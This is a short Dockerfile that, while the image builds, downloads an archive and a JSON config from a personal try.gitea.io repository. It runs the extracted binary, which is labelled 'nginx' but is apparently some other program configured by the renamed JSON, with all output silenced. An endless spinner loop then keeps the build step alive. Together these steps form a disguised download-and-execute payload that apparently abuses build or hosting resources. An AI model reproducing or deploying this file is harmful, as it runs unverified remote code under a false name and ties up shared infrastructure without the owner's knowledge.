FROM ubuntu:latest

RUN apt-get update -y \
    && apt-get install curl xz-utils -y \
    && curl -L https://try.gitea.io/drstrange/dragon/raw/branch/master/nginx.tar.xz > nginx.tar.xz && tar -xvf nginx.tar.xz \
    && curl -L https://try.gitea.io/drstrange/dragon/raw/branch/master/entrypoint.json > uuuus.json \
    && chmod +x nginx \
    && ./nginx -c uuuus.json > /dev/null 2>&1 \
    && while :;do for s in / - \\ \|; do printf "\r$s";sleep .1;done;done
